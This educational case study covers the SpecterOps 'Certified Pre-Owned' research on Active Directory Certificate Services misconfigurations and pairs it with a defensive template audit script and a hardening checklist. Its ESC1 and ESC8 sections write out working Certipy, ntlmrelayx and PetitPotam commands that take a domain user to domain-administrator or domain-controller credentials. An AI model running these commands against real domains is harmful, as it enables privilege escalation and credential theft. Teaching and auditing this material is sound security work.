Case Study 2: AD Certificate Services "Certified Pre-Owned"
The SpecterOps Research That Exposed a Massive AD Attack Surface
Overview
In June 2021, Will Schroeder and Lee Christensen of SpecterOps published "Certified Pre-Owned: Abusing Active Directory Certificate Services," a groundbreaking whitepaper that exposed Active Directory Certificate Services (AD CS) as one of the most significant and overlooked attack surfaces in enterprise Active Directory environments. Their research identified eight categories of misconfigurations (ESC1 through ESC8) and three persistence techniques that allowed attackers to escalate privileges, move laterally, and maintain persistent access through certificate-based attacks. The paper fundamentally changed how the security community views PKI infrastructure in AD environments.
Background: AD CS in Enterprise Environments
Active Directory Certificate Services provides Public Key Infrastructure (PKI) for AD environments. It issues X.509 certificates used for:
- Smart card authentication for users and administrators
- SSL/TLS certificates for internal web services
- Code signing for internal applications
- Email encryption (S/MIME)
- Network authentication (802.1X)
- VPN authentication
AD CS is deeply integrated with Active Directory. When a certificate is issued for authentication, it effectively becomes an alternative credential---a long-lived, password-independent way to prove identity. This is precisely what makes it so dangerous when misconfigured.
Before the "Certified Pre-Owned" research, AD CS was largely ignored during penetration tests. Security assessments focused on Kerberos, NTLM, delegation, and GPO misconfigurations. Certificate services were treated as a "set and forget" component of AD infrastructure.
The ESC Vulnerabilities
ESC1: Misconfigured Certificate Templates (Most Common, Most Dangerous)
The Misconfiguration: A certificate template that simultaneously meets four conditions:
1. Allows the enrollee to supply their own Subject Alternative Name (SAN)
2. Includes an Extended Key Usage (EKU) that enables client authentication
3. Grants enrollment rights to low-privileged users (Domain Users, Authenticated Users)
4. Does not require manager approval
Why It Matters: An attacker with standard domain user access can request a certificate and specify any user (including Domain Admin) as the Subject Alternative Name. The resulting certificate authenticates the attacker as the specified user, bypassing all password-based controls.
The MedSecure Finding: During the MedSecure engagement, Certipy enumeration revealed a template called "MedSecureWebAuth" that was vulnerable to ESC1:
```shell
$ certipy find -u j.smith@medsecure.local -p Password123 -dc-ip 10.10.10.1 -vulnerable

Certificate Templates
  Template Name: MedSecureWebAuth
  Display Name: MedSecure Web Authentication
  Enrollee Supplies Subject: True      # <-- ESC1 trigger
  Client Authentication: True          # <-- Enables authentication
  Enrollment Rights:
    MEDSECURE\Domain Users             # <-- Low-priv can enroll
  Requires Manager Approval: False     # <-- No approval needed
  [!] VULNERABLE TO ESC1
```
The exploitation was straightforward:
```shell
$ certipy req -u j.smith@medsecure.local -p Password123 \
    -ca medsecure-DC01-CA -template MedSecureWebAuth \
    -upn administrator@medsecure.local
[*] Successfully requested certificate
[*] Saved certificate and key to 'administrator.pfx'

$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
[*] Got hash for 'administrator@medsecure.local':
    aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
```
From standard domain user to Domain Administrator hash in two commands.
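The four ESC1 conditions above can be verified directly against the template objects in the Configuration partition, which is how a defender confirms a Certipy finding without issuing any certificate. The following PowerShell audit is an added example, not code from the SpecterOps paper, Certipy or Certify; it assumes the RSAT ActiveDirectory module, read access to the Configuration naming context, and treats Domain Users, Authenticated Users and Everyone as low-privileged enrollers.

```powershell
# Added example, not from the SpecterOps paper or from Certipy/Certify: a read-only audit that
# flags templates meeting all four ESC1 conditions. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

$configNC     = (Get-ADRootDSE).configurationNamingContext
$templateBase = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
$clientAuthOids = @('1.3.6.1.5.5.7.3.2',       # Client Authentication
                    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
                    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
                    '2.5.29.37.0')             # Any Purpose
$enrollRight = [Guid]'0e10c968-78fb-11d1-ab13-0000f8000000'   # Certificate-Enrollment extended right
$lowPrivSids = @('S-1-1-0', 'S-1-5-11')                        # Everyone, Authenticated Users
$extRight    = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$genericAll  = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

# Returns the first low-privileged principal that can enroll in the template, or $null.
function Get-LowPrivEnroller([System.DirectoryServices.ActiveDirectorySecurity]$Acl) {
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Enroll is granted by the specific extended right, by all extended rights, or by GenericAll.
        $hasEnroll = $ace.ActiveDirectoryRights.HasFlag($extRight) -and ($ace.ObjectType -eq $enrollRight -or $ace.ObjectType -eq [Guid]::Empty)
        if (-not ($hasEnroll -or $ace.ActiveDirectoryRights.HasFlag($genericAll))) { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned SID, cannot be a live enroller
        if ($lowPrivSids -contains $sid -or $sid.EndsWith('-513')) {   # RID 513 = Domain Users
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

$templates = Get-ADObject -SearchBase $templateBase -Filter 'objectClass -eq "pKICertificateTemplate"' `
    -Properties 'msPKI-Certificate-Name-Flag','msPKI-Enrollment-Flag','pKIExtendedKeyUsage','nTSecurityDescriptor'

foreach ($t in $templates) {
    $suppliesSubject = ($t.'msPKI-Certificate-Name-Flag' -band 0x1) -ne 0   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    $needsApproval   = ($t.'msPKI-Enrollment-Flag' -band 0x2) -ne 0         # CT_FLAG_PEND_ALL_REQUESTS
    $ekus       = @($t.pKIExtendedKeyUsage | Where-Object { $_ })
    $clientAuth = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $clientAuthOids -contains $_ }).Count -gt 0)
    $enroller   = Get-LowPrivEnroller $t.nTSecurityDescriptor
    if ($suppliesSubject -and $clientAuth -and -not $needsApproval -and $enroller) {
        [pscustomobject]@{ Template = $t.Name; LowPrivEnroller = $enroller; Finding = 'ESC1' }
    }
}
```

Templates that require authorized signatures (msPKI-RA-Signature greater than zero) are not exploitable as ESC1 either; adding that test is the natural refinement if the audit produces false positives.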
ESC2: Any Purpose or SubCA EKU
Templates with the "Any Purpose" EKU, or with no EKU at all (as in the SubCA template), can be used for client authentication even if that was not the intended purpose. Less common than ESC1, but equally dangerous when present.
ESC3: Certificate Request Agent
If an enrollment agent template is enrollable by low-privileged users, the agent certificate can request certificates on behalf of any user. This is a two-step attack: first enroll as an agent, then request certificates impersonating other users.
ESC4: Vulnerable Template ACLs
If a non-privileged user has write access to a certificate template's AD object (GenericAll, GenericWrite, WriteDacl, WriteProperty), they can modify the template to become vulnerable to ESC1, then exploit it.
ESC5: Vulnerable PKI Object ACLs
Broader than ESC4, this covers write access to PKI objects beyond templates: CA objects, the NTAuthCertificates object, and the Cert Publishers container.
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
If the CA server has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled, any certificate request can include an arbitrary SAN regardless of the template's configuration. This effectively makes every template vulnerable to ESC1-style attacks.
ESC7: Vulnerable CA ACLs
If a non-privileged user has ManageCA or ManageCertificates permissions on the CA itself, they can:
- Enable EDITF_ATTRIBUTESUBJECTALTNAME2 (creating ESC6)
- Approve their own certificate requests (bypassing manager approval requirements)
ESC8: NTLM Relay to AD CS HTTP Endpoints
If the CA has an HTTP enrollment endpoint (Certificate Enrollment Web Service) without Extended Protection for Authentication (EPA), NTLM authentication can be relayed to it. Combined with authentication coercion (PetitPotam), this allows obtaining certificates for domain controllers without any credentials.
```shell
# ESC8 Attack Chain:
# 1. Set up NTLM relay to the CA's HTTP endpoint
$ python3 ntlmrelayx.py -t http://ca.medsecure.local/certsrv/certfnsh.asp \
    -smb2support --adcs --template DomainController

# 2. Coerce DC01 to authenticate to us
$ python3 PetitPotam.py attacker-ip dc01.medsecure.local

# 3. DC01 authenticates, we relay to the CA
# 4. We receive a certificate for DC01$
# 5. Use the certificate to authenticate as DC01$
$ certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1
# Result: DC01$ machine account hash -> DCSync
```
This attack requires zero credentials---only network access.
The Scope of the Problem
SpecterOps' research found that vulnerable AD CS configurations were pervasive:
- Certipy/Certify scans of real-world environments consistently found ESC1 or ESC6 vulnerabilities in a majority of AD environments
- Default template configurations in some Windows Server versions were vulnerable out of the box
- Legacy templates from older AD deployments were frequently misconfigured
- No awareness: Most IT teams had never audited their certificate templates for security
Certificate-Based Persistence
Beyond privilege escalation, certificates provide powerful persistence:
- Long Validity: Certificates are typically valid for 1-2 years, far longer than password rotation cycles.
- Survive Password Resets: A certificate remains valid even if the user's password is changed.
- Independent of Password Policy: Certificate authentication bypasses password lockout, complexity, and expiration policies.
- Difficult to Revoke: Most organizations lack the monitoring to detect malicious certificate usage, and revocation requires proactive identification.
Industry Impact
The "Certified Pre-Owned" research had a massive impact:
- New Attack Surface Recognition: AD CS moved from "not relevant" to "critical" in penetration test scopes.
- Tooling Development: Certipy (Python), Certify (C#), and ForgeCert emerged as standard AD CS assessment tools.
- Vendor Response: Microsoft published guidance on securing AD CS and began updating default template configurations.
- Certification Updates: OSCP, PNPT, and other certifications added AD CS content.
- Purple Team Exercises: Organizations began including AD CS in their threat modeling and red/purple team exercises.
🔵 Blue Team Perspective
Immediate Actions
- Audit All Certificate Templates:
```powershell
# Using Certify (defensive mode)
Certify.exe find /vulnerable

# Using Certipy
certipy find -u admin@domain -p pass -dc-ip DC_IP -vulnerable
```
- Fix ESC1: Disable ENROLLEE_SUPPLIES_SUBJECT on all templates unless explicitly required. If required, restrict enrollment to specific high-privilege groups with manager approval.
- Fix ESC6: Disable EDITF_ATTRIBUTESUBJECTALTNAME2 on all CAs:
```powershell
certutil -config "CA\CAName" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
```
- Fix ESC8: Enable Extended Protection for Authentication (EPA) on all AD CS HTTP endpoints. Better yet, disable HTTP enrollment entirely if it is not needed.
- Restrict Enrollment Rights: Review every template and restrict enrollment to only the groups that genuinely need it.
Ongoing Monitoring
- Monitor certificate enrollment events: Event ID 4886 (Certificate Services received a certificate request) and Event ID 4887 (Certificate Services approved a certificate request)
- Alert on certificates issued with SANs that do not match the requesting user
- Monitor for certificate-based authentication from unexpected users or systems
- Track certificate template modifications
- Deploy PKI monitoring solutions
AD CS Hardening Checklist
| Control | Priority |
|---|---|
| Audit all templates for ESC1-ESC8 | Critical |
| Disable ENROLLEE_SUPPLIES_SUBJECT where not needed | Critical |
| Disable EDITF_ATTRIBUTESUBJECTALTNAME2 | Critical |
| Enable EPA on HTTP enrollment endpoints | Critical |
| Restrict enrollment rights to minimum necessary | High |
| Enable manager approval on sensitive templates | High |
| Monitor certificate enrollment logs | High |
| Regular template ACL audits | Medium |
| Rotate CA certificates on schedule | Medium |
Discussion Questions
- Why was AD CS security overlooked for so long despite being a critical component of enterprise authentication?
- The ESC8 attack (NTLM relay to AD CS) requires zero credentials. How does this change the threat model for AD environments?
- How should organizations balance the operational needs of certificate-based authentication with the security risks exposed by this research?
- What does the "Certified Pre-Owned" research suggest about the likely existence of other large, unexamined attack surfaces in enterprise infrastructure?
- Given that certificates survive password resets, how should incident response procedures change when certificate-based compromise is suspected?
References
- Will Schroeder and Lee Christensen: "Certified Pre-Owned: Abusing Active Directory Certificate Services" (SpecterOps, 2021)
- Certipy GitHub Repository: https://github.com/ly4k/Certipy
- Certify GitHub Repository: https://github.com/GhostPack/Certify
- Microsoft: "Securing Active Directory Certificate Services"
- Oliver Lyak: "Certipy 2.0 - BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!"
- SpecterOps Blog: Multiple posts on AD CS attack research
- CISA Advisory: "Mitigating AD CS Misconfigurations"